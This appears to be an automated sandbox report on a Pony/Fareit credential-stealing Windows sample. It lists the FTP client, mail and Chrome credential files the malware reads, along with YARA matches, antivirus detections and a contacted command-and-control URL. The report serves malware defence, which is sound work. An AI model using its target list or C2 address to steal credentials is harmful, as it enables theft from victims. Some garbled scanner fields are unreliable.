                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbarJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings.ccsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: HKEY_CURRENT_USER\Software\TurboFTPJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Local\CuteFTP\Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBITJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.jsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Roaming\BitKinex\Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xmlJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\ProgramData\LeapWare\LeapFTP\Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\ProgramData\GPSoftware\Directory Opus\Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Local\BitKinex\Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xmlJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: HKEY_CURRENT_USER\Software\AceBITJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\History.datJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 9\QCToolbarJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\ProgramData\FileZilla\filezilla.xmlJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\ProgramData\BitKinex\Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.datJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter\Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exeFile opened: C:\ProgramData\SharedSettings_1_0_5.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Program Files (x86)\CuteFTP\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\SharedSettings.ccs
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\4\History.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.ccs
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\SmartFTP\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\GHISLER\wcx_ftp.ini
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Quick.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\FileZilla\recentservers.xml
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\ExpanDrive\drives.js
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\FlashFXP\4\Sites.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\FTP Explorer\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\FTPGetter\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.sqlite
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Roaming\SharedSettings.sqlite
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Program Files (x86)\CuteFTP\sm.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\3\Quick.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\4\Sites.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\sm.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Roaming\LeapWare\LeapFTP\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\CuteFTP\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\TurboFTP
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Roaming\CuteFTP\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\SmartFTP\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: HKEY_CURRENT_USER\Software\FTP Explorer\FTP Explorer\Workspace\MFCToolBar-224
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\FileZilla\recentservers.xml
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\TurboFTP\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.ccs
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: HKEY_CURRENT_USER\Software\FTP Explorer\Profiles
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\Frigate3\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.ccs
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\sm.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Roaming\AceBIT\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\FileZilla\sitemanager.xml
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\CoffeeCup Software\SharedSettings.sqlite
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\TurboFTP\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\3\Sites.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\sm.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\RhinoSoft.com\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\FTP Explorer\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\AceBIT\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\FlashFXP\3\Quick.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\FTPRush\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\Estsoft\ALFTP\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\ExpanDrive\drives.js
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\CuteFTP\sm.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqlite
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\FlashFXP\3\Sites.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqlite
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xml
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\FTPGetter\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\SharedSettings.sqlite
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\AceBIT\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqlite
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.ini
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Windows\32BitFtp.ini
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\FlashFXP\4\Quick.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\Frigate3\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\FTPRush\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\SharedSettings.sqlite
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\FlashFXP\3\History.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: HKEY_LOCAL_MACHINE\Software\TurboFTP
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\FlashFXP\4\History.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccs
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Windows\wcx_ftp.ini
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.dat
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqlite
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.dat
                  Tries to steal Mail credentials (via file registry)
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe | Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword 1_2_0040EC16
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe | Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword 1_2_0040EC16
                  Source: C:\Users\user\Desktop\2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe | Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword 1_1_0040EC16
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword 12_2_0040EC16
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword 12_2_0040EC16
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword 12_1_0040EC16
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                  Source: C:\Users\user\AppData\Roaming\Adnexal8.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                  Remote Access Functionality:

                  Yara detected Fareit stealer
                  Source: Yara match | File source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: Adnexal8.exe PID: 5600, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: Adnexal8.exe PID: 6892, type: MEMORYSTR
                  Yara detected Pony
                  Source: Yara match | File source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7012, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe PID: 7060, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: Adnexal8.exe PID: 5600, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: Adnexal8.exe PID: 6892, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                  Valid Accounts 1 | Scripting 11 | Startup Items 1 | Startup Items 1 | Deobfuscate/Decode Files or Information 1 | OS Credential Dumping 2 | Account Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                  Default Accounts | Native API 1 | Valid Accounts 1 | Valid Accounts 1 | Scripting 11 | Input Capture 1 | File and Directory Discovery 3 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                  Domain Accounts | At (Linux) | Registry Run Keys / Startup Folder 2 | Access Token Manipulation 11 | Obfuscated Files or Information 3 | Credentials in Registry 2 | System Information Discovery 34 | SMB/Windows Admin Shares | Input Capture 1 | Automated Exfiltration | Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                  Local Accounts | At (Windows) | Logon Script (Mac) | Process Injection 21 | Install Root Certificate 1 | NTDS | Query Registry 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
                  Cloud Accounts | Cron | Network Logon Script | Registry Run Keys / Startup Folder 2 | Software Packing 23 | LSA Secrets | Security Software Discovery 11 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                  Replication Through Removable Media | Launchd | Rc.common | Rc.common | Masquerading 1 | Cached Domain Credentials | Process Discovery 11 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                  External Remote Services | Scheduled Task | Startup Items | Startup Items | Valid Accounts 1 | DCSync | System Owner/User Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                  Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation 11 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
                  Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection 21 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

                  Behavior Graph

                  [Behavior graph image not preserved. Behavior Graph ID: 499220; Sample: 2CEC15C8FEF9435ABD5C332486D...; Startdate: 08/10/2021; Architecture: WINDOWS; Score: 100]
                  Process tree shown in the graph:
                  • wscript.exe started Adnexal8.exe, which started a second Adnexal8.exe process, which started cmd.exe, which started conhost.exe
                  • 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe dropped C:\Users\user\AppData\Roaming\Adnexal8.exe (PE32) and started a second 2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe process, which started cmd.exe, which started conhost.exe
                  • DNS/IP info attached to the first Adnexal8.exe process: 192.168.2.1


                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  Source | Detection | Scanner | Label
                  2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe | 74% | Virustotal |
                  2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe | 71% | Metadefender |
                  2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe | 89% | ReversingLabs | Win32.Infostealer.PonyStealer
                  2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe | 100% | Avira | HEUR/AGEN.1112794
                  2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe | 100% | Joe Sandbox ML |

                  Dropped Files

                  Source | Detection | Scanner | Label
                  C:\Users\user\AppData\Roaming\Adnexal8.exe | 100% | Avira | HEUR/AGEN.1112794
                  C:\Users\user\AppData\Roaming\Adnexal8.exe | 100% | Joe Sandbox ML |
                  C:\Users\user\AppData\Roaming\Adnexal8.exe | 73% | Metadefender |
                  C:\Users\user\AppData\Roaming\Adnexal8.exe | 90% | ReversingLabs | Win32.Infostealer.PonyStealer

                  Unpacked PE Files

                  Source | Detection | Scanner | Label
                  10.2.Adnexal8.exe.4d141c2.1.unpack | 100% | Avira | TR/Kryptik.avp.8
                  12.2.Adnexal8.exe.400000.0.unpack | 100% | Avira | TR/Kryptik.avp.8
                  0.0.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1112794
                  0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.4c441c2.1.unpack | 100% | Avira | TR/Kryptik.avp.8
                  0.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1112794
                  12.0.Adnexal8.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1112794
                  10.0.Adnexal8.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1112794
                  1.2.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack | 100% | Avira | TR/Kryptik.avp.8
                  10.2.Adnexal8.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1112794
                  1.1.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack | 100% | Avira | TR/Kryptik.avp.8
                  1.0.2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1112794
                  12.1.Adnexal8.exe.400000.0.unpack | 100% | Avira | TR/Kryptik.avp.8

                  Domains

                  No Antivirus matches

                  URLs

                  Source | Detection | Scanner | Label
                  http://https://ftp://operawand.dat_Software | 0% | Avira URL Cloud | safe
                  ftp://http://https://ftp.fireFTPsites.datSeaMonkey | 0% | Avira URL Cloud | safe
                  http://www.ibsensoftware.com/ | 0% | URL Reputation | safe
                  http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.phpYUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI | 0% | Avira URL Cloud | safe
                  http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php | 0% | Avira URL Cloud | safe

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted URLs

                  Name | Malicious | Antivirus Detection | Reputation
                  http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php | true | Avira URL Cloud: safe | unknown

                  URLs from Memory and Binaries

                                                  high
                                                  https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg92CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmpfalse
                                                    high
                                                    https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=168R2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://www.google.com/gws_rd=ssl2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://www.google.com/searchLMEM2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmpfalse
                                                          high
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmpfalse
                                                            high
                                                            https://consent.google.com/set?pc=s&uxe=4421591B2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652515440.00000000006B4000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.msn.com/de-ch/ocid=iehp2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652533561.00000000006CB000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://consent.google.com/setpc=s&uxe=4421591W2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652515440.00000000006B4000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.651943509.0000000000708000.00000004.00000001.sdmp, Adnexal8.exe, 0000000C.00000003.692004376.00000000006E3000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://consent.google.com/set?pc=s&uxe=4421591=2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe, 00000001.00000003.652515440.00000000006B4000.00000004.00000001.sdmpfalse
                                                                      high

                                                                      Contacted IPs

                                                                      Public

                                                                      IP | Domain | Country | Flag | ASN | ASN Name | Malicious

                                                                      Private

                                                                      IP
                                                                      192.168.2.1

                                                                      General Information

                                                                      Joe Sandbox Version:33.0.0 White Diamond
                                                                      Analysis ID:499220
                                                                      Start date:08.10.2021
                                                                      Start time:05:18:10
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 7m 57s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Sample file name:2CEC15C8FEF9435ABD5C332486D8AD7083EEB9EB84DE9.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
